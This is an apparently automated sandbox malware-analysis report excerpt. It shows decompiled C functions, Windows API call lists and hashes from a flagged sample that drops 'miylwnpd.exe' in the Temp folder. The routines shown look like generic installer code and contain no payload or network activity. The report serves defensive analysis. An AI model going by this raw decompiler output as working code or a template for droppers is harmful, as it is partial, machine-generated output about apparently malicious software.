            0x004067c6
            0x00000000
            0x00406780
            0x0040679e
            0x004067a7
            0x00406844
            0x00406848
            0x00406850
            0x00406850
            0x00000000
            0x00406848
            0x004067b1
            0x0040683e
            0x00406842
            0x00000000
            0x00000000
            0x00000000
            0x00406842
            0x0040677e
            0x00000000
            0x0040670b

            APIs
            • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000400), ref: 004067C6
            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Directory$SystemWindowslstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
            • API String ID: 4260037668-3982504609
            • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
            • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
            • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
            • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
            				struct tagLOGBRUSH _v16;
            				long _t39;
            				long _t41;
            				void* _t44;
            				signed char _t50;
            				long* _t54;
            
            				if(_a4 + 0xfffffecd > 5) {
            					L18:
            					return 0;
            				}
            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
            					goto L18;
            				} else {
            					_t50 = _t54[5];
            					if((_t50 & 0xffffffe0) != 0) {
            						goto L18;
            					}
            					_t39 =  *_t54;
            					if((_t50 & 0x00000002) != 0) {
            						_t39 = GetSysColor(_t39);
            					}
            					if((_t54[5] & 0x00000001) != 0) {
            						SetTextColor(_a8, _t39);
            					}
            					SetBkMode(_a8, _t54[4]);
            					_t41 = _t54[1];
            					_v16.lbColor = _t41;
            					if((_t54[5] & 0x00000008) != 0) {
            						_t41 = GetSysColor(_t41);
            						_v16.lbColor = _t41;
            					}
            					if((_t54[5] & 0x00000004) != 0) {
            						SetBkColor(_a8, _t41);
            					}
            					if((_t54[5] & 0x00000010) != 0) {
            						_v16.lbStyle = _t54[2];
            						_t44 = _t54[3];
            						if(_t44 != 0) {
            							DeleteObject(_t44);
            						}
            						_t54[3] = CreateBrushIndirect( &_v16);
            					}
            					return _t54[3];
            				}
            			}









            0x00404643
            0x004046f9
            0x00000000
            0x004046f9
            0x00404654
            0x00404658
            0x00000000
            0x00404672
            0x00404672
            0x0040467b
            0x00000000
            0x00000000
            0x0040467d
            0x00404689
            0x0040468c
            0x0040468c
            0x00404692
            0x00404698
            0x00404698
            0x004046a4
            0x004046aa
            0x004046b1
            0x004046b4
            0x004046b7
            0x004046b9
            0x004046b9
            0x004046c1
            0x004046c7
            0x004046c7
            0x004046d1
            0x004046d6
            0x004046d9
            0x004046de
            0x004046e1
            0x004046e1
            0x004046f1
            0x004046f1
            0x00000000
            0x004046f4

            APIs
            • GetWindowLongW.USER32(?,000000EB), ref: 0040464E
            • GetSysColor.USER32(00000000), ref: 0040468C
            • SetTextColor.GDI32(?,00000000), ref: 00404698
            • SetBkMode.GDI32(?,?), ref: 004046A4
            • GetSysColor.USER32(?), ref: 004046B7
            • SetBkColor.GDI32(?,?), ref: 004046C7
            • DeleteObject.GDI32(?), ref: 004046E1
            • CreateBrushIndirect.GDI32(?), ref: 004046EB
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
            • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
            • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
            				intOrPtr _t65;
            				intOrPtr _t66;
            				intOrPtr _t72;
            				void* _t76;
            				void* _t79;
            
            				_t72 = __edx;
            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
            				_t65 = 2;
            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
            				_t66 = E00402D84(_t65);
            				_t79 = _t66 - 1;
            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
            				if(_t79 < 0) {
            					L36:
            					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
            				} else {
            					__ecx = 0x3ff;
            					if(__eax > 0x3ff) {
            						 *(__ebp - 0x44) = 0x3ff;
            					}
            					if( *__edi == __bx) {
            						L34:
            						__ecx =  *(__ebp - 0xc);
            						__eax =  *(__ebp - 8);
            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
            						if(_t79 == 0) {
            							 *(_t76 - 4) = 1;
            						}
            						goto L36;
            					} else {
            						 *(__ebp - 0x38) = __ebx;
            						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
            						if( *(__ebp - 0x44) > __ebx) {
            							do {
            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
            										__eax = __ebp - 0x50;
            										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
            											goto L34;
            										} else {
            											goto L21;
            										}
            									} else {
            										goto L34;
            									}
            								} else {
            									__eax = __ebp - 0x40;
            									_push(__ebx);
            									_push(__ebp - 0x40);
            									__eax = 2;
            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
            									if(__eax == 0) {
            										goto L34;
            									} else {
            										__ecx =  *(__ebp - 0x40);
            										if(__ecx == __ebx) {
            											goto L34;
            										} else {
            											__ax =  *(__ebp + 0xa) & 0x000000ff;
            											 *(__ebp - 0x4c) = __ecx;
            											 *(__ebp - 0x50) = __eax;
            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
            												L28:
            												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
            											} else {
            												__ebp - 0x50 = __ebp + 0xa;
            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
            													L21:
            													__eax =  *(__ebp - 0x50);
            												} else {
            													__edi =  *(__ebp - 0x4c);
            													__edi =  ~( *(__ebp - 0x4c));
            													while(1) {
            														_t22 = __ebp - 0x40;
            														 *_t22 =  *(__ebp - 0x40) - 1;
            														__eax = 0xfffd;
            														 *(__ebp - 0x50) = 0xfffd;
            														if( *_t22 == 0) {
            															goto L22;
            														}
            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
            														__edi = __edi + 1;
            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
            														__eax = __ebp + 0xa;
            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
            															continue;
            														} else {
            															goto L21;
            														}
            														goto L22;
            													}
            												}
            												L22:
            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
            													goto L28;
            												} else {
            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
            														} else {
            															__ecx =  *(__ebp - 0xc);
            															__edx =  *(__ebp - 8);
            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
            														}
            														goto L34;
            													} else {
            														__ecx =  *(__ebp - 0xc);
            														__edx =  *(__ebp - 8);
            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
            														 *(__ebp - 0x38) = __eax;
            														if(__ax == __bx) {
            															goto L34;
            														} else {
            															goto L26;
            														}
            													}
            												}
            											}
            										}
            									}
            								}
            								goto L37;
            								L26:
            								__eax =  *(__ebp - 8);
            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
            						}
            						goto L34;
            					}
            				}
            				L37:
            				return 0;
            			}








            0x004026ec
            0x004026ee
            0x004026f1
            0x004026f3
            0x004026f6
            0x004026fb
            0x004026ff
            0x00402702
            0x00402705
            0x00402c2a
            0x00402c2d
            0x0040270b
            0x0040270b
            0x00402712
            0x00402714
            0x00402714
            0x0040271a
            0x0040287e
            0x0040287e
            0x00402881
            0x00402886
            0x004015b6
            0x0040292e
            0x0040292e
            0x00000000
            0x00402720
            0x00402721
            0x0040272c
            0x0040272f
            0x0040273b
            0x0040273f
            0x004027d7
            0x004027ef
            0x004027ff
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402745
            0x00402745
            0x00402748
            0x00402749
            0x0040274c
            0x00402751
            0x00402758
            0x00402760
            0x00000000
            0x00402766
            0x00402766
            0x0040276b
            0x00000000
            0x00402771
            0x00402771
            0x00402779
            0x0040277c
            0x0040277f
            0x0040283a
            0x00402841
            0x00402785
            0x0040278b
            0x00402797
            0x00402801
            0x00402801
            0x00402799
            0x00402799
            0x0040279c
            0x0040279e
            0x0040279e
            0x0040279e
            0x004027a1
            0x004027a6
            0x004027a9
            0x00000000
            0x00000000
            0x004027ab
            0x004027ae
            0x004027bc
            0x004027c2
            0x004027d0
            0x00000000
            0x004027d2
            0x00000000
            0x004027d2
            0x00000000
            0x004027d0
            0x0040279e
            0x00402804
            0x00402807
            0x00000000
            0x00402809
            0x0040280e
            0x0040284f
            0x00402871
            0x00402878
            0x0040285d
            0x0040285d
            0x00402860
            0x00402863
            0x00402866
            0x00402866
            0x00000000
            0x00402817
            0x00402817
            0x0040281a
            0x0040281d
            0x00402823
            0x00402827
            0x0040282a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040282a
            0x0040280e
            0x00402807
            0x0040277f
            0x0040276b
            0x00402760
            0x00000000
            0x0040282c
            0x0040282c
            0x0040282f
            0x00402838
            0x00000000
            0x0040272f
            0x0040271a
            0x00402c33
            0x00402c39

            APIs
            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
              • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: File$Pointer$ByteCharMultiWide$Read
            • String ID: 9
            • API String ID: 163830602-2366072709
            • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
            • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
            • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
            • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004056D0(signed int _a4, WCHAR* _a8) {
            				struct HWND__* _v8;
            				signed int _v12;
            				WCHAR* _v32;
            				long _v44;
            				int _v48;
            				void* _v52;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				WCHAR* _t27;
            				signed int _t28;
            				long _t29;
            				signed int _t37;
            				signed int _t38;
            
            				_t27 =  *0x7a7a84;
            				_v8 = _t27;
            				if(_t27 != 0) {
            					_t37 =  *0x7a8b54;
            					_v12 = _t37;
            					_t38 = _t37 & 0x00000001;
            					if(_t38 == 0) {
            						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
            					}
            					_t27 = lstrlenW(0x7a0f68);
            					_a4 = _t27;
            					if(_a8 == 0) {
            						L6:
            						if((_v12 & 0x00000004) == 0) {
            							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
            						}
            						if((_v12 & 0x00000002) == 0) {
            							_v32 = 0x7a0f68;
            							_v52 = 1;
            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
            							_v44 = 0;
            							_v48 = _t29 - _t38;
            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
            						}
            						if(_t38 != 0) {
            							_t28 = _a4;
            							0x7a0f68[_t28] = 0;
            							return _t28;
            						}
            					} else {
            						_t27 = lstrlenW(_a8) + _a4;
            						if(_t27 < 0x1000) {
            							_t27 = lstrcatW(0x7a0f68, _a8);
            							goto L6;
            						}
            					}
            				}
            				return _t27;
            			}

















            0x004056d6
            0x004056e0
            0x004056e5
            0x004056eb
            0x004056f6
            0x004056f9
            0x004056fc
            0x00405702
            0x00405702
            0x00405708
            0x00405710
            0x00405713
            0x00405730
            0x00405734
            0x0040573d
            0x0040573d
            0x00405747
            0x00405750
            0x0040575c
            0x00405763
            0x00405767
            0x0040576a
            0x0040577d
            0x0040578b
            0x0040578b
            0x0040578f
            0x00405791
            0x00405794
            0x00000000
            0x00405794
            0x00405715
            0x0040571d
            0x00405725
            0x0040572b
            0x00000000
            0x0040572b
            0x00405725
            0x00405713
            0x004057a0

            APIs
            • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
            • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
            • lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
            • SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
              • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
              • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSendlstrlen$lstrcat$TextWindow
            • String ID:
            • API String ID: 1495540970-0
            • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
            • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
            • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
            • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E004068F5(WCHAR* _a4) {
            				short _t5;
            				short _t7;
            				WCHAR* _t19;
            				WCHAR* _t20;
            				WCHAR* _t21;
            
            				_t20 = _a4;
            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
            					_t20 =  &(_t20[4]);
            				}
            				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
            					_t20 =  &(_t20[2]);
            				}
            				_t5 =  *_t20;
            				_t21 = _t20;
            				_t19 = _t20;
            				if(_t5 != 0) {
            					do {
            						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
            							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
            							_t19 = CharNextW(_t19);
            						}
            						_t20 = CharNextW(_t20);
            						_t5 =  *_t20;
            					} while (_t5 != 0);
            				}
            				 *_t19 =  *_t19 & 0x00000000;
            				while(1) {
            					_push(_t19);
            					_push(_t21);
            					_t19 = CharPrevW();
            					_t7 =  *_t19;
            					if(_t7 != 0x20 && _t7 != 0x5c) {
            						break;
            					}
            					 *_t19 =  *_t19 & 0x00000000;
            					if(_t21 < _t19) {
            						continue;
            					}
            					break;
            				}
            				return _t7;
            			}








            0x004068f7
            0x00406900
            0x00406917
            0x00406917
            0x0040691e
            0x0040692a
            0x0040692a
            0x0040692d
            0x00406930
            0x00406935
            0x00406937
            0x00406940
            0x00406944
            0x00406961
            0x00406969
            0x00406969
            0x0040696e
            0x00406970
            0x00406973
            0x00406978
            0x00406979
            0x0040697d
            0x0040697d
            0x0040697e
            0x00406985
            0x00406987
            0x0040698e
            0x00000000
            0x00000000
            0x00406996
            0x0040699c
            0x00000000
            0x00000000
            0x00000000
            0x0040699c
            0x004069a1

            APIs
            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
            • CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
            • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
            • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Char$Next$Prev
            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
            • API String ID: 589700163-4010320282
            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
            • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
            • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040302E(intOrPtr _a4) {
            				short _v132;
            				long _t6;
            				struct HWND__* _t7;
            				struct HWND__* _t15;
            
            				if(_a4 != 0) {
            					_t15 =  *0x79f73c;
            					if(_t15 != 0) {
            						_t15 = DestroyWindow(_t15);
            					}
            					 *0x79f73c = 0;
            					return _t15;
            				}
            				if( *0x79f73c != 0) {
            					return E00406A77(0);
            				}
            				_t6 = GetTickCount();
            				if(_t6 >  *0x7a8aac) {
            					if( *0x7a8aa8 == 0) {
            						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
            						 *0x79f73c = _t7;
            						return ShowWindow(_t7, 5);
            					}
            					if(( *0x7a8b54 & 0x00000001) != 0) {
            						wsprintfW( &_v132, L"... %d%%", E00403012());
            						return E004056D0(0,  &_v132);
            					}
            				}
            				return _t6;
            			}







            0x0040303d
            0x0040303f
            0x00403046
            0x00403049
            0x00403049
            0x0040304f
            0x00000000
            0x0040304f
            0x0040305d
            0x00000000
            0x00403060
            0x00403067
            0x00403073
            0x0040307b
            0x004030b9
            0x004030c2
            0x00000000
            0x004030c7
            0x00403084
            0x00403095
            0x00000000
            0x004030a3
            0x00403084
            0x004030cf

            APIs
            • DestroyWindow.USER32(?,00000000), ref: 00403049
            • GetTickCount.KERNEL32 ref: 00403067
            • wsprintfW.USER32 ref: 00403095
              • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
              • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
              • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
              • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
              • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
              • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
              • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
            • CreateDialogParamW.USER32 ref: 004030B9
            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
              • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
